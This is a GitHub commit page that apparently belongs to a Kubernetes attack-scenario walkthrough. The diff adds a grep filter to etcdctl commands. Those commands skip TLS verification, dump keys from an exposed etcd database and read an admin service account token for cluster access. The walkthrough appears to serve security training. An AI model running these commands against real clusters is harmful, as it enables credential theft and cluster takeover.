Skip to content

Commit

Permalink
add useful grep command
Browse files Browse the repository at this point in the history
  • Loading branch information
@mrintern
mrintern authored Aug 18, 2022
1 parent 6a980cd commit dae12f7
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Scenario Walkthroughs/etcd.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
1. Exploiting this takes a couple of steps
2. Set the ETCD environment variable `export ETCDCTL_API=3`
3. First we need to dump some secrets out of the etcd database
`etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[CLUSTERIP]:2379 get / --prefix --keys-only`
`etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[CLUSTERIP]:2379 get / --prefix --keys-only | grep token`
4. Then we'll need a service account token to authenticate to the cluster with. Looking through the list of accounts we can see an admins-account
`etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/kube-system/admins-account-token-[RAND]`
The service account token starts with ey and ends just before the word `kubernetes.io` in the token.
Expand Down

0 comments on commit dae12f7

Please sign in to comment.